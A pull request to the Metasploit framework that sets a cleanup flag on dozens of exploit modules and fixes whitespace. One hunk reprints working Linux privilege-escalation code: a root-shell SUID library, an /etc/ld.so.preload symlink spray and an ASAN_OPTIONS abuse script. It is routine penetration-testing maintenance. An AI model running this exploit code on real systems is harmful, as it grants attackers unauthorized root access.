### PR TITLE
Manually set `needs_cleanup` for exploits that need it

### DIFF
--- a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@@ -83,6 +83,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Stability'   => [ CRASH_SERVICE_DOWN, ],
       },
     ))
+
+    self.needs_cleanup = true
   end
 
   def p(offset)

--- a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
+++ b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
@@ -54,6 +54,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
       ]
     )
+
+    self.needs_cleanup = true
   end
 
   def execute_query(query)

--- a/modules/exploits/linux/http/nagios_xi_chained_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_chained_rce.rb
@@ -38,6 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
       OptInt.new('USER_ID',      [true, 'User ID in the database to target', 1]),
       OptString.new('API_TOKEN', [false, 'If an API token was already stolen, skip the SQLi'])
     ])
+
+    self.needs_cleanup = true
   end
 
   def check

--- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
@@ -49,6 +49,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "May 17 2012",
       'DefaultTarget'  => 0))
+
+    self.needs_cleanup = true
   end
 
 

--- a/modules/exploits/linux/http/webid_converter.rb
+++ b/modules/exploits/linux/http/webid_converter.rb
@@ -48,6 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ], self.class
       )
 
+      self.needs_cleanup = true
   end
 
   def check

--- a/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
+++ b/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
@@ -68,6 +68,8 @@ class MetasploitModule < Msf::Exploit::Local
     register_advanced_options [
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
     ]
+
+    self.needs_cleanup = true
   end
 
   def base_dir

--- a/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb
+++ b/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb
@@ -75,6 +75,8 @@ class MetasploitModule < Msf::Exploit::Local
       OptBool.new('ForceExploit',  [false, 'Override check result', false]),
       OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
     ]
+
+    self.needs_cleanup = true
   end
 
   def base_dir

--- a/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb
+++ b/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb
@@ -206,50 +206,50 @@ int main(void)
 
     lib_name = ".#{rand_text_alphanumeric 5..10}"
     lib_path = "#{base_dir}/#{lib_name}.so"
-    lib = <<-EOF
-#include <stdlib.h>
-#include <stdio.h>
-#include <sys/stat.h>
-#include <unistd.h>
-void init(void) __attribute__((constructor));
-void __attribute__((constructor)) init() {
-  if (setuid(0) || setgid(0))
-    _exit(1);
-  unlink("/etc/ld.so.preload");
-  chown("#{@rootshell_path}", 0, 0);
-  chmod("#{@rootshell_path}", 04755);
-  _exit(0);
-}
+    lib = <<~EOF
+      #include <stdlib.h>
+      #include <stdio.h>
+      #include <sys/stat.h>
+      #include <unistd.h>
+      void init(void) __attribute__((constructor));
+      void __attribute__((constructor)) init() {
+        if (setuid(0) || setgid(0))
+          _exit(1);
+        unlink("/etc/ld.so.preload");
+        chown("#{@rootshell_path}", 0, 0);
+        chmod("#{@rootshell_path}", 04755);
+        _exit(0);
+      }
     EOF
     upload_and_compile lib_path, lib, '-fPIC -shared -ldl -Wall'
 
     spray_name = ".#{rand_text_alphanumeric 5..10}"
     spray_path = "#{base_dir}/#{spray_name}"
-    spray = <<-EOF
-#include <stdio.h>
-#include <sys/stat.h>
-#include <unistd.h>
-int main(void)
-{
-  pid_t pid = getpid();
-  char buf[64];
-  for (int i=0; i<=#{datastore['SPRAY_SIZE']}; i++) {
-    snprintf(buf, sizeof(buf), "#{@log_prefix}.%ld", (long)pid+i);
-    symlink("/etc/ld.so.preload", buf);
-  }
-}
+    spray = <<~EOF
+      #include <stdio.h>
+      #include <sys/stat.h>
+      #include <unistd.h>
+      int main(void)
+      {
+        pid_t pid = getpid();
+        char buf[64];
+        for (int i=0; i<=#{datastore['SPRAY_SIZE']}; i++) {
+          snprintf(buf, sizeof(buf), "#{@log_prefix}.%ld", (long)pid+i);
+          symlink("/etc/ld.so.preload", buf);
+        }
+      }
     EOF
     upload_and_compile spray_path, spray, '-Wall'
 
     exp_name = ".#{rand_text_alphanumeric 5..10}"
     exp_path = "#{base_dir}/#{exp_name}"
-    exp = <<-EOF
-#!/bin/sh
-#{spray_path}
-ASAN_OPTIONS="disable_coredump=1 suppressions='/#{@log_prefix}
-#{lib_path}
-' log_path=./#{@log_prefix} verbosity=0" "#{suid_exe_path}" >/dev/null 2>&1
-ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "#{suid_exe_path}" >/dev/null 2>&1
+    exp = <<~EOF
+      #!/bin/sh
+      #{spray_path}
+      ASAN_OPTIONS="disable_coredump=1 suppressions='/#{@log_prefix}
+      #{lib_path}
+      ' log_path=./#{@log_prefix} verbosity=0" "#{suid_exe_path}" >/dev/null 2>&1
+      ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "#{suid_exe_path}" >/dev/null 2>&1
     EOF
     upload_and_chmodx exp_path, exp
 

--- a/modules/exploits/multi/http/extplorer_upload_exec.rb
+++ b/modules/exploits/multi/http/extplorer_upload_exec.rb
@@ -49,6 +49,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'The path to the web application', '/com_extplorer_2.1.0/']),
         OptString.new('USERNAME',  [true, 'The username for eXtplorer', 'admin'])
       ])
+
+    self.needs_cleanup = true
   end
 
   def check

--- a/modules/exploits/multi/http/glossword_upload_exec.rb
+++ b/modules/exploits/multi/http/glossword_upload_exec.rb
@@ -42,6 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME',  [true, 'The username for Glossword', 'admin']),
         OptString.new('PASSWORD',  [true, 'The password for Glossword', 'admin'])
       ])
+
+    self.needs_cleanup = true
   end
 
   def check

--- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
+++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
@@ -65,6 +65,8 @@ class MetasploitModule < Msf::Exploit::Remote
         Opt::RPORT(8080),
         OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/'])
       ])
+
+    self.needs_cleanup = true
   end
 
   def on_new_session(client)

--- a/modules/exploits/multi/http/hyperic_hq_script_console.rb
+++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb
@@ -52,6 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('PASSWORD',  [ true, 'The password for the application', 'hqadmin' ]),
         OptString.new('TARGETURI', [ true, 'The path to HypericHQ', '/' ]),
       ])
+
+    self.needs_cleanup = true
   end
 
   #

--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -61,6 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('API_TOKEN',  [ false, 'The API token for the specified username', '' ]),
         OptString.new('TARGETURI', [ true,  'The path to the Jenkins-CI application', '/jenkins/' ])
       ])
+
+    self.needs_cleanup = true
   end
 
   def post_auth?

--- a/modules/exploits/multi/http/kordil_edms_upload_exec.rb
+++ b/modules/exploits/multi/http/kordil_edms_upload_exec.rb
@@ -40,6 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'The path to the web application', '/kordil_edms/']),
       ])
+
+    self.needs_cleanup = true
   end
 
   def check

--- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
+++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
@@ -73,6 +73,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),
         OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'mutiny' ])
       ])
+
+    self.needs_cleanup = true
   end
 
   def lookup_lhost()

--- a/modules/exploits/multi/http/navigate_cms_rce.rb
+++ b/modules/exploits/multi/http/navigate_cms_rce.rb
@@ -45,6 +45,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options [
       OptString.new('TARGETURI', [true, 'Base Navigate CMS directory path', '/navigate/']),
     ]
+
+    self.needs_cleanup = true
   end
 
   def login_bypass

--- a/modules/exploits/multi/http/orientdb_exec.rb
+++ b/modules/exploits/multi/http/orientdb_exec.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

--- a/modules/exploits/multi/http/orientdb_exec.rb
+++ b/modules/exploits/multi/http/orientdb_exec.rb
@@ -47,6 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('PASSWORD', [ true,  'HTTP Basic Auth Password', 'writer' ]),
         OptString.new('TARGETURI', [ true,  'The path to the OrientDB application', '/' ])
       ])
+
+    self.needs_cleanup = true
   end
 
   def check

--- a/modules/exploits/multi/http/qdpm_upload_exec.rb
+++ b/modules/exploits/multi/http/qdpm_upload_exec.rb
@@ -54,6 +54,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME',  [true, 'The username to login with']),
         OptString.new('PASSWORD',  [true, 'The password to login with'])
       ])
+
+    self.needs_cleanup = true
   end
 
   def check

--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -61,6 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action', ""]),
         OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
       ])
+
+    self.needs_cleanup = true
   end
 
   def execute_command(cmd, opts = {})

--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -55,12 +55,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => 'Jul 13 2010',
       'DefaultTarget' => 0))
 
-      register_options(
-        [
-          Opt::RPORT(8080),
-          OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action', ""]),
-          OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
-        ])
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action', ""]),
+        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
+      ])
   end
 
   def execute_command(cmd, opts = {})

--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -63,12 +63,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => 'Jan 06 2012',
       'DefaultTarget' => 2))
 
-      register_options(
-        [
-          Opt::RPORT(8080),
-          OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
-          OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
-        ])
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
+        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
+      ])
   end
 
   def execute_command(cmd, opts = {})

--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -69,6 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
         OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
       ])
+
+    self.needs_cleanup = true
   end
 
   def execute_command(cmd, opts = {})

--- a/modules/exploits/multi/http/struts_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_default_action_mapper.rb
@@ -73,6 +73,8 @@ class MetasploitModule < Msf::Exploit::Remote
       # It isn't OptPath becuase it's a *remote* path
       OptString.new("WritableDir", [ true, "A directory where we can write files (only on Linux targets)", "/tmp" ])
     ])
+
+    self.needs_cleanup = true
   end
 
   def on_new_session(session)

--- a/modules/exploits/multi/http/testlink_upload_exec.rb
+++ b/modules/exploits/multi/http/testlink_upload_exec.rb
@@ -52,6 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'The path to the web application', '/testlink-1.9.3/'])
       ])
+
+    self.needs_cleanup = true
   end
 
   def check

--- a/modules/exploits/multi/http/webpagetest_upload_exec.rb
+++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb
@@ -46,10 +46,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => "Jul 13 2012",
       'DefaultTarget'  => 0))
 
-      register_options(
-        [
-          OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
-        ])
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
+      ])
   end
 
 

--- a/modules/exploits/multi/http/webpagetest_upload_exec.rb
+++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb
@@ -50,6 +50,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
       ])
+
+    self.needs_cleanup = true
   end
 
 

--- a/modules/exploits/multi/php/wp_duplicator_code_inject.rb
+++ b/modules/exploits/multi/php/wp_duplicator_code_inject.rb
@@ -47,6 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]),
       OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 40]),
       ])
+
+    self.needs_cleanup = true
   end
 
   def check

--- a/modules/exploits/unix/dhcp/bash_environment.rb
+++ b/modules/exploits/unix/dhcp/bash_environment.rb
@@ -61,6 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote
     ))
 
     deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
+
+    self.needs_cleanup = true
   end
 
   def on_new_session(session)

--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -58,6 +58,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
       ]
     )
+
+    self.needs_cleanup = true
   end
 
   def check

--- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
@@ -56,6 +56,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [ true, "The base path to the web application", "/forums/"])
       ])
+
+    self.needs_cleanup = true
   end
 
   def base

--- a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb
+++ b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb
@@ -62,6 +62,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [ false,  "The user to authenticate as (anonymous if username not provided)"]),
         OptString.new('PASSWORD', [ false,  "The password to authenticate with (anonymous if password not provided)" ])
       ])
+
+    self.needs_cleanup = true
   end
 
   def post_auth?

--- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
@@ -53,6 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [true, "The username to authenticate with" ]),
         OptString.new('PASSWORD', [true, "The password to authenticate with" ])
       ])
+
+    self.needs_cleanup = true
   end
 
 

--- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
@@ -47,12 +47,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => 'Jun 23 2012'
       ))
 
-      register_options(
-        [
-          OptString.new('TARGETURI',	[ true, "The base path to the web application", "/sugarcrm/"]),
-          OptString.new('USERNAME', [true, "The username to authenticate with" ]),
-          OptString.new('PASSWORD', [true, "The password to authenticate with" ])
-        ])
+    register_options(
+      [
+        OptString.new('TARGETURI',	[ true, "The base path to the web application", "/sugarcrm/"]),
+        OptString.new('USERNAME', [true, "The username to authenticate with" ]),
+        OptString.new('PASSWORD', [true, "The password to authenticate with" ])
+      ])
   end
 
 

--- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
@@ -57,6 +57,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [ true, "The base path to the web application", "/tiki/"])
       ])
+
+    self.needs_cleanup = true
   end
 
 

--- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
@@ -53,10 +53,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => 'Jul 04 2012'
       ))
 
-      register_options(
-        [
-          OptString.new('TARGETURI', [ true, "The base path to the web application", "/tiki/"])
-        ])
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "The base path to the web application", "/tiki/"])
+      ])
   end
 
 

--- a/modules/exploits/unix/webapp/xoda_file_upload.rb
+++ b/modules/exploits/unix/webapp/xoda_file_upload.rb
@@ -51,6 +51,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [ true, "The base path to the web application", "/xoda/"])
       ])
+
+    self.needs_cleanup = true
   end
 
 

--- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
@@ -49,6 +49,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Feb 22 2013",
       'DefaultTarget'  => 0))
+
+    self.needs_cleanup = true
   end
 
   def primer

--- a/modules/exploits/windows/browser/honeywell_tema_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb
@@ -58,6 +58,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
       ])
+
+    self.needs_cleanup = true
   end
 
   def exploit

--- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb
+++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb
@@ -54,6 +54,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jan 11 2012'))
+
+    self.needs_cleanup = true
   end
 
   #

--- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb
+++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb
@@ -54,6 +54,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Aug 16 2011'))
+
+    self.needs_cleanup = true
   end
 
   #

--- a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
@@ -67,6 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
       ])
 
+    self.needs_cleanup = true
   end
 
   # Just reminding the user to delete LrWeb2MdrvLoader.dll

--- a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb
+++ b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb
@@ -79,6 +79,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]),
         OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
       ])
+
+    self.needs_cleanup = true
   end
 
   def on_new_session(client)

--- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
+++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
@@ -51,6 +51,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Apr 16 2013",
       'DefaultTarget'  => 0))
+
+    self.needs_cleanup = true
   end
 
   def exploit

--- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
+++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
@@ -56,6 +56,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('WINDOWSTEMP', [ true, "The Windows temporal folder.", "C:/Windows/Temp" ]),
         OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),
       ])
+
+    self.needs_cleanup = true
   end
 
   def on_new_session(client)

--- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
+++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
@@ -48,6 +48,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'The URI path of the Avaya CCR applications', '/'])
       ])
+
+    self.needs_cleanup = true
   end
 
   #

--- a/modules/exploits/windows/http/cyclope_ess_sqli.rb
+++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb
@@ -51,6 +51,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptPort.new('RPORT',     [true, "The web application's port", 7879]),
         OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
       ])
+
+    self.needs_cleanup = true
   end
 
   def check

--- a/modules/exploits/windows/http/cyclope_ess_sqli.rb
+++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb
@@ -46,11 +46,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => "Aug 8 2012",
       'DefaultTarget'  => 0))
 
-      register_options(
-        [
-          OptPort.new('RPORT',     [true, "The web application's port", 7879]),
-          OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
-        ])
+    register_options(
+      [
+        OptPort.new('RPORT',     [true, "The web application's port", 7879]),
+        OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
+      ])
   end
 
   def check

--- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb
@@ -78,6 +78,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultTarget' => 0,
       'DisclosureDate' => 'Nov 01 2011'))
+
+    self.needs_cleanup = true
   end
 
   # The following code allows to migrate if having into account

--- a/modules/exploits/windows/http/oracle_btm_writetofile.rb
+++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb
@@ -76,6 +76,8 @@ class MetasploitModule < Msf::Exploit::Remote
         Opt::RPORT(7001),
         OptInt.new('DEPTH', [false, 'Traversal depth'])
       ])
+
+    self.needs_cleanup = true
   end
 
   def on_new_session(client)

--- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
+++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
@@ -55,6 +55,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptPort.new('RPORT', [true, 'The target port', 9000])
       ])
+
+    self.needs_cleanup = true
   end
 
 

--- a/modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
+++ b/modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
@@ -62,6 +62,8 @@ class MetasploitModule < Msf::Exploit::Remote
       ])
 
     deregister_options('SRVHOST', 'SRVPORT', 'URIPATH')
+
+    self.needs_cleanup = true
   end
 
   def check

--- a/modules/exploits/windows/http/umbraco_upload_aspx.rb
+++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize
     super(
-      'Name'        	=> 'Umbraco CMS Remote Command Execution',
+      'Name'          => 'Umbraco CMS Remote Command Execution',
       'Description'   => %q{
           This module can be used to execute a payload on Umbraco CMS 4.7.0.378.
         The payload is uploaded as an ASPX script by sending a specially crafted
@@ -53,6 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'The URI path of the Umbraco login page', '/umbraco/'])
       ])
+
+    self.needs_cleanup = true
   end
 
   #

--- a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb
+++ b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb
@@ -53,6 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(443)
       ])
+
+    self.needs_cleanup = true
   end
 
   #

--- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb
+++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
@@ -50,6 +50,8 @@ class MetasploitModule < Msf::Exploit::Remote
       ])
 
     framework.events.add_exploit_subscriber(self)
+
+    self.needs_cleanup = true
   end
 
 

--- a/modules/exploits/windows/iis/msadc.rb
+++ b/modules/exploits/windows/iis/msadc.rb
@@ -64,6 +64,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('DBUID', [ true,  "The SQL Server uid (default is sa)", 'sa']),
         OptString.new('DBPASSWORD', [ false,  "The SQL Server password (default is blank)", '']),
       ])
+
+    self.needs_cleanup = true
   end
 
   def post_auth?

--- a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb
+++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb
@@ -54,6 +54,8 @@ class MetasploitModule < Msf::Exploit::Local
       'DisclosureDate'=> 'May 14 2013'
     }))
 
+
+    self.needs_cleanup = true
   end
 
   def on_new_session

--- a/modules/exploits/windows/misc/altiris_ds_sqli.rb
+++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb
@@ -60,6 +60,8 @@ class MetasploitModule < Msf::Exploit::Remote
       OptBool.new('ENABLE_SECURITY',  [ true, "Enable Local Deployment Console Authentication", false ])
     ])
     deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+
+    self.needs_cleanup = true
   end
 
   def execute_command(cmd, opts = {})

--- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
+++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
@@ -63,6 +63,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Both MySQL and HTTP need to use this, we'll have to register on the fly.
     deregister_options('RPORT')
+
+    self.needs_cleanup = true
   end
 
 

--- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb
+++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb
@@ -55,6 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptInt.new('DEPTH', [true, 'Traversal depth', 6])
       ])
 
+    self.needs_cleanup = true
   end
 
   def on_new_session(client)

--- a/modules/exploits/windows/novell/netiq_pum_eval.rb
+++ b/modules/exploits/windows/novell/netiq_pum_eval.rb
@@ -55,6 +55,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptBool.new('SSL', [true, 'Use SSL', true]),
         OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60])
       ])
+
+    self.needs_cleanup = true
   end
 
   def check

--- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
+++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
@@ -50,6 +50,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => true,
       'DisclosureDate' => 'Oct 11 2018',
       'DefaultTarget'  => 0))
+
+    self.needs_cleanup = true
   end
 
   def on_new_session(client)

--- a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb
+++ b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb
@@ -52,6 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptBool.new('SSL', [true, 'Use SSL', true]),
         OptInt.new('DEPTH', [true, 'Traversal depth to reach the root', 13])
       ])
+
+    self.needs_cleanup = true
   end
 
   def on_new_session(client)


### PR DESCRIPTION
The `needs_cleanup` flag needs to be set per-module when an exploit needs an interactive session to clean up. Some `FileDropper` exploits need additional cleanup to what the mixin provides, but since all `FileDropper`s already mark themselves as needing cleanup those are not covered here. A few of these could potentially be refactored to use the original exploitation method to clean up or to compile the list of files/commands to clean up ahead of time, but that is out of the scope of this fix.

Also cleaned up some glaring white space issues I saw while auditing these modules.

As far as the future goes, after auditing all the in-module uses of `on_new_session`, I think that any meaningful cleanup capability in pingback payloads will need to be accompanied by an overhaul of how we think about cleanup as a whole. Also, it will likely be useful in the future to separate out "I want to do this on a new session" (several modules not touched in this PR) from "I need to do this on the target to keep it stable" (some of these modules) and from "I need to do this on the target to maintain good opsec" (most of these).

Verification
========

- [x] `./msfconsole`
- [x] `use` the modules in this PR
- [x] Verify `show payloads` does not show pingback payloads